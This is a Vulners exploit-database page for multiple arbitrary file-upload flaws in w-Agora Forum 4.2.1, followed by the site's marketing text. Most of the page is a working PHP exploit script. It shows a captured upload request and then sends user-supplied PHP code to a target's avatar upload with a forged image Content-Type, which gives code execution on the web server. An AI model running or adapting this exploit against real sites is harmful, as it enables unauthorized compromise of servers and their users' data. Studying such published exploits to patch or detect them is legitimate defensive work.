Vulners
Lucene search
W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities
source: https://www.securityfocus.com/bid/23055/info
w-Agora is prone to multiple arbitrary file-upload vulnerabilities.
An attacker can exploit these vulnerabilities to upload PHP script code and execute it in the context of the webserver process.
w-Agora 4.2.1 is vulnerable.
<?php
/*
Title .......................: w-Agora Forum 4.2.1 Remote File Upload Exploit
Site ........................: http://www.w-agora.com/en/download.php
Version .....................: 4.2.1
Author ......................: Treasure Priyamal
Site ........................: http://treasuresec.com
E-mail ......................: treasure[at]treasuresec.com
Discription
===========
w-Agora avatar upload option has content file detect option , but it can be replace with simply editing
POST Request from your browser
Here is a dump from Temp-Data I editied while im upload the File. Just simply replacing the Content-Type
you will be able to upload your script
6:28:18.073[118ms][total 3862ms] Status: 200[OK]
POST http://localhost/w-agora/browse_avatar.php Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]
Request Headers:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8]
Accept-Language[en-us,en;q=0.5]
Accept-Encoding[gzip, deflate]
Accept-Charset[ISO-8859-1,utf-8;q=0.7,*;q=0.7]
Keep-Alive[115]
Connection[keep-alive]
Referer[http://localhost/w-agora/browse_avatar.php?site=localhost]
Cookie[wa_lang=en; WAS_localhost_test=LastVisit%3D1306715684%26ThisVisit%3D1306715918%26visited%3D1306672722%2B; WAP_localhost_test=Visits%3D1%26LastVisit%3D1306715684; localhost_test_sort=newest; WAP_localhost_auth=lastVisit%3D1306715682%26uid%3Dtest%26pw%3D098f6bcd4621d373cade4e832627b4f6; localhost_auth=lastVisit%3D1306715998%26uid%3Dtest%26pw%3D098f6bcd4621d373cade4e832627b4f6]
Post Data:
POST_DATA[-----------------------------76401208715012
Content-Disposition: form-data; name="site"
localhost
-----------------------------76401208715012
Content-Disposition: form-data; name="submitted"
true
-----------------------------76401208715012
Content-Disposition: form-data; name="perpage"
20
-----------------------------76401208715012
Content-Disposition: form-data; name="first"
0
-----------------------------76401208715012
Content-Disposition: form-data; name="avatar"; filename="echo.php"
Content-Type: image/jpeg\
<?php phpinfo(); ?>
-----------------------------76401208715012
Content-Disposition: form-data; name="submit"
Copy file
-----------------------------76401208715012--
]
Response Headers:
Date[Mon, 30 May 2011 00:58:18 GMT]
Server[Apache/2.2.11 (Win32) PHP/5.3.0]
X-Powered-By[PHP/5.3.0]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
*/
if(count($argv) == 5)
{
echo "\n\n";
echo "+---------------------------------------------------------------+\r\n";
echo "| w-Agora Forum 4.2.1 Remote File Upload Exploit |\r\n";
echo "| Treasure Security |\r\n";
echo "| by Treasure Priyamal |\r\n";
echo "| Usage: php exploit.php site.com /path/ user pass |\r\n";
echo "+---------------------------------------------------------------+\r\n";
echo "\n";
echo "Code to write in the file (ie. <?php phpinfo(); ?>) :\r\n\n";
$code = trim(fgets(STDIN));
$socket = @fsockopen($argv[1], 80, $eno, $estr, 30);
if(!$socket)
{
die("Could not connect to ".$argv[1].". Operation aborted.");
}
$part1 = "POST http://192.168.1.101/w-agora/browse_avatar.php?site=localhost HTTP/1.1\r\n";
$part1 .= "Host: " . $argv[1] . "\r\n";
$part1 .= "User-Agent : Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\r\n";
$part1 .= "Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$part1 .= "Connection: keep-alive\r\n";
$part1 .= "Accept-Language : en-us,en;q=0.5\r\n";
$part1 .= "Referer :localhost/w-agora/browse_avatar.php?site=localhost\r\n";
$part1 .= "Cookie : wa_lang=en\r\n";
$part1 .= "Content-Type : multipart/form-data; boundary=---------------------------14695017222113685839218008876\r\n";
$part2 = "-----------------------------14695017222113685839218008876\r\n";
$part2 .= "Content-Disposition: form-data; name=\"site\"\r\n";
$part2 .= "localhost\r\n";
$part2 .= "-----------------------------14695017222113685839218008876\r\n";
$part2 .= "Content-Disposition: form-data; name=\"submitted\"\r\n";
$part2 .= "true\r\n";
$part2 .= "-----------------------------14695017222113685839218008876\r\n";
$part2 .= "Content-Disposition: form-data; name=\"perpage\"\r\n";
$part2 .= "20\r\n";
$part2 .= "-----------------------------14695017222113685839218008876\r\n";
$part2 .= "Content-Disposition: form-data; name=\"first\"\r\n";
$part2 .= "0\r\n";
$part2 .= "-----------------------------14695017222113685839218008876\r\n";
$part2 .= "Content-Disposition: form-data; name=\"avatar\"; filename=\"file.php\"\r\n";
$part2 .= "Content-Type: image/gif\r\n"; // this is where the magic happens
$part2 .= $code."\r\n";
$part2 .= "-----------------------------14695017222113685839218008876\r\n";
$part2 .= "Content-Disposition: form-data; name=\"Submit\"\r\n";
$part2 .= "Copy file\r\n";
$part2 .= "-----------------------------14695017222113685839218008876\r\n";
$part1 .= "Content-Length: " . strlen($part2) . "\r\n\r\n";
$part1 .= $part2;
fwrite($socket, $part1);
echo "check the upload folder";
}
else
{
echo "\n\n";
echo "+---------------------------------------------------------------+\r\n";
echo "| w-Agora Forum 4.2.1 Remote File Upload Exploit |\r\n";
echo "| Treasure Security |\r\n";
echo "| by Treasure Priyamal |\r\n";
echo "+---------------------------------------------------------------+\r\n";
echo "| Usage: php exploit.php site.com /path/ user pass |\r\n";
echo "+---------------------------------------------------------------+\r\n";
echo "\n\n";
}
?>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4